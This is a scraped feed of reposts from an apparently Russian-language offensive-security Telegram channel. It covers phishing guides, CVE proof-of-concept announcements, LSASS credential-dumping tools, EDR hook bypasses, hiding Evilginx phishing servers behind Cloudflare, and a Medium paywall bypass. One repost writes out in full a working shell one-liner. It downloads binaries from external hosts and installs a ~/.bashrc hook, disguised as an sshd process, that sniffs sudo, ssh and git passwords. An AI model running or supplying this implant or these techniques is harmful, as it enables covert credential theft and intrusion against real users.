Гео и язык канала: Россия, Английский

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Гео и язык канала
Россия, Английский
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Репост из: Похек
From Zero to Hero Phishing Company (ONSEC).pdf
From Zero to Hero: Phishing company
#phishing #фишинг #перевод #от_подписчика

Эксклюзивно для канала Похек, @resource_not_found сделал перевод этой статьи на русский язык.

🙏 Спасибо большое ему и надеюсь она будет вам полезна)

🌚 @poxek

🏆 Pentest Award: Ежегодная независимая премия для пентестеров

Команда Awillix объявила о начале приема заявок на ежегодную премию — Pentest Award.

Это отличная возможность выразить свои достижения и продемонстрировать вклад в ИБ сообщество, а также поделиться лучшими практическими историями.

В этот раз будет 6 номинаций, по три призовых места в каждой:

— Пробив WEB;
— Пробив инфраструктуры;
— Девайс;
— Hack the logic;
— Раз bypass, два bypass;
— Ловись рыбка.

Главный приз — тяжеленная стеклянная именная статуэтка, которую, к слову, в прошлом году выиграл мой дорогой snovvcrash за первое место.

И, конечно, не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также другие бесценные подарки от BI.ZONE Bug Bounty и VK Bug Bounty.


Репост из: Offensive Twitter
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]

A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀

command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/script" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'

🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

🐥 [ tweet ]

прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger

Репост из: 1N73LL1G3NC3

LPE from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.

Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/

Evilginx ❤️ Gophish

The highly anticipated official integration between Evilginx and Gophish has been unveiled in the latest Evilginx 3.3 update. Alongside this major feature, the update brings numerous quality-of-life enhancements.

🔗 https://breakdev.org/evilginx-3-3-go-phish/

#evilginx #gophish #phishing

Репост из: 1N73LL1G3NC3
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CVE-2024-1086 Linux kernel LPE

Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.

A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.

Репост из: PT SWARM
🎁 Source Code Disclosure in IIS 10.0! Almost.

There is a method to reveal the source code of some .NET apps. Here's how it works.

👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/

Репост из: 1N73LL1G3NC3
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CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC

📜 Description
This script presents a proof of concept (PoC) for CVE-2024-21413, a significant security vulnerability discovered in Microsoft Outlook with a CVSS of 9.8. Termed the #MonikerLink bug, this vulnerability has far-reaching implications, including the potential leakage of local NTLM information and the possibility of remote code execution. Moreover, it highlights an attack vector that could bypass Office Protected View, thereby extending its threat to other Office applications.

Репост из: SecuriXy.kz
Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket


скоро и в Impacket запилят и будет красота

⚙️ MultiDump

This is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly. MultiDump supports LSASS dump via ProcDump.exe or Comsvc.dll, it offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis

🔗 https://github.com/Xre0uS/MultiDump

#lsass #remote #cpp #python

👍 Whitespots: Application Security Platform

It’s a really powerful security automation platform for those of us who are working on defense side.

🚀 The platform solves such problems as:
Issues deduplication (within incremental scans + between different scanners using rules);
Automated verification (using rules);
Automated resolving (if the issue doesn’t exist in a new report);
Running of custom tools in a sequence (like Subfinder -> Naabu -> Httpx-> Nuclei);
Sequences scheduling.

🔗 Source:

#devsecops #sast #dast #osa #automation

⚙️ Introduction to Bypassing Hooks EDR

The article explores methods of bypassing EDR hooks in the user mode of the Windows operating system, starting with an explanation of system calls and their role in transitioning between user and kernel modes. Subsequently, various techniques for bypassing hooks are discussed, including direct and indirect syscalls, along with their advantages and potential limitations when used for evading protective mechanisms.

🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html

#maldev #edr #hooks #syscalls

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🖼️ Bypass Medium Paywall

A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:

🔗 https://freedium.cfd/
🔗 https://medium-forall.vercel.app/

#medium #premium #bypass

Репост из: Ralf Hacker Channel
Набор инструментов для удалённого дампа паролей.


Ну и сам блог:

#pentest #redteam #creds

⛓ Trusted Domain, Hidden Danger

In this blog post describes a prevalent tactic used in phishing attacks, which involves exploiting legitimate platforms for redirection through deceptive links.

🔗 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trusted-domain-hidden-danger-deceptive-url-redirections-in-email-phishing-attacks/

#phishing #url #redirect

🖼️ Protect Evilginx using Cloudflare

Using a combination of Cloudflare and HTML Obfuscation, it is possible to protect your Evilginx server from being flagged as deceptive and so increase your chances of success on Red Team and Social Engineering engagements.

🔗 https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

#phishing #cloudflare #evilginx #html

Показано 20 последних публикаций.